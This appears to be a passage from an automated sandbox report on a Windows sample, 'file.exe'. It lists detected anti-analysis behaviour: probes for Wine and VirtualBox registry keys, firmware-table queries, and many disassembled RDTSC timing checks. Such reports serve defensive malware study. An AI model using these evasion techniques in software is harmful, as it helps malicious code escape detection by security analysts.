              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E6688 second address: 2E668E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E668E second address: 2E6698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E67ED second address: 2E67F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E67F3 second address: 2E67F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E67F8 second address: 2E6814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80AC503256h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E6996 second address: 2E699D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E699D second address: 2E69A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E6AF2 second address: 2E6B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F80ACC66776h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E6C7A second address: 2E6C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F80AC503250h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E6C92 second address: 2E6CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66780h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E6CA6 second address: 2E6CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA769 second address: 2EA76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA76D second address: 2EA77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA77B second address: 2EA77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA77F second address: 2EA788 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA788 second address: 2EA78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA804 second address: 2EA80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F80AC503246h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA80F second address: 2EA814 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA814 second address: 2EA837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F80AC503259h 0x00000010 jmp 00007F80AC503253h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA909 second address: 2EA90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EA90D second address: 2EA97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 2A956F7Bh 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F80AC503248h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 clc 0x00000028 mov edx, dword ptr [ebp+122D38A9h] 0x0000002e lea ebx, dword ptr [ebp+12461694h] 0x00000034 call 00007F80AC50324Bh 0x00000039 jmp 00007F80AC503255h 0x0000003e pop edi 0x0000003f xchg eax, ebx 0x00000040 push esi 0x00000041 push edi 0x00000042 jbe 00007F80AC503246h 0x00000048 pop edi 0x00000049 pop esi 0x0000004a push eax 0x0000004b pushad 0x0000004c push ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAA24 second address: 2EAA2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAA2A second address: 2EAA37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAA37 second address: 2EAA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAA47 second address: 2EAA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAA4B second address: 2EAA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAA4F second address: 2EAA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAA55 second address: 2EAA7B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F80ACC66785h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jo 00007F80ACC6677Eh 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAA7B second address: 2EAB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jnl 00007F80AC503264h 0x0000000f pop eax 0x00000010 mov esi, dword ptr [ebp+122D38A1h] 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F80AC503248h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 push ebx 0x00000033 movsx edi, bx 0x00000036 pop edx 0x00000037 mov ecx, dword ptr [ebp+122D368Dh] 0x0000003d push 00000000h 0x0000003f jnc 00007F80AC50324Ch 0x00000045 push 00000003h 0x00000047 mov ecx, esi 0x00000049 movzx esi, cx 0x0000004c push 873B5B9Bh 0x00000051 push eax 0x00000052 push edx 0x00000053 jne 00007F80AC50324Ch 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAB09 second address: 2EAB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F80ACC66776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC04 second address: 2EAC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC0B second address: 2EAC11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC11 second address: 2EAC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC15 second address: 2EAC2B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F80ACC66776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e jo 00007F80ACC6677Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC2B second address: 2EAC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a jc 00007F80AC50325Ah 0x00000010 jmp 00007F80AC503254h 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F80AC50324Bh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAC5F second address: 2EACEB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F80ACC66778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edx 0x0000000f jmp 00007F80ACC6677Ch 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jng 00007F80ACC66792h 0x0000001c call 00007F80ACC66785h 0x00000021 mov dword ptr [ebp+122D1D82h], ebx 0x00000027 pop edi 0x00000028 push 00000003h 0x0000002a sub dword ptr [ebp+122D2B48h], eax 0x00000030 jo 00007F80ACC6677Ch 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+122D189Eh], ebx 0x0000003e push 00000003h 0x00000040 mov ecx, dword ptr [ebp+122D3891h] 0x00000046 call 00007F80ACC66779h 0x0000004b jmp 00007F80ACC66788h 0x00000050 push eax 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EACEB second address: 2EACEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EACEF second address: 2EAD12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC6677Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F80ACC6677Bh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAD12 second address: 2EAD55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F80AC50324Eh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jmp 00007F80AC503259h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EAD55 second address: 2EADA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 mov esi, 35ED056Eh 0x0000000e lea ebx, dword ptr [ebp+124616A8h] 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F80ACC66778h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F80ACC66786h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EADA4 second address: 2EADAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EADAA second address: 2EADAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FC736 second address: 2FC73C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30B41D second address: 30B421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30B421 second address: 30B425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30B425 second address: 30B43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F80ACC66784h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30B43F second address: 30B449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F80AC503246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30B449 second address: 30B44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30928D second address: 309297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3093BB second address: 3093C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3093C1 second address: 3093DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F80AC503252h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30954B second address: 309551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309551 second address: 309555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309555 second address: 30955E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30955E second address: 309563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309563 second address: 309593 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F80ACC66780h 0x00000010 pushad 0x00000011 jmp 00007F80ACC66782h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309593 second address: 309599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309722 second address: 30972A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30972A second address: 309754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80AC50324Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c jmp 00007F80AC503255h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309754 second address: 30976C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80ACC66784h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30976C second address: 309788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F80AC50324Ah 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309788 second address: 30978C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309E38 second address: 309E56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007F80AC503246h 0x00000009 jo 00007F80AC503246h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007F80AC50324Ah 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309E56 second address: 309E6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66783h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309E6E second address: 309E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309FBF second address: 309FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F80ACC6677Ah 0x0000000c popad 0x0000000d jo 00007F80ACC66798h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309FDD second address: 309FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309FEB second address: 309FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30A412 second address: 30A432 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F80AC503252h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30A432 second address: 30A438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30A438 second address: 30A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30A43C second address: 30A442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30A442 second address: 30A469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Fh 0x00000007 jo 00007F80AC50325Ah 0x0000000d jmp 00007F80AC50324Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FE0D9 second address: 2FE0E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FE0E1 second address: 2FE0E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FE0E9 second address: 2FE0ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FE0ED second address: 2FE113 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F80AC50324Ch 0x0000000c jns 00007F80AC503246h 0x00000012 jnc 00007F80AC503246h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30AB34 second address: 30AB3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F80ACC66776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30ADF3 second address: 30ADFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30ADFB second address: 30AE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F80ACC66778h 0x0000000d push ecx 0x0000000e jmp 00007F80ACC6677Eh 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30AF65 second address: 30AF98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F80AC50324Ch 0x00000008 jmp 00007F80AC503251h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F80AC50324Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30AF98 second address: 30AFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F80ACC66776h 0x0000000d jmp 00007F80ACC6677Fh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30AFB4 second address: 30AFBA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30D9B3 second address: 30D9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F80ACC66782h 0x0000000d js 00007F80ACC66776h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F80ACC66776h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30C274 second address: 30C27A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30DAFB second address: 30DB05 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F80ACC66776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30DC1E second address: 30DC25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31132F second address: 311333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
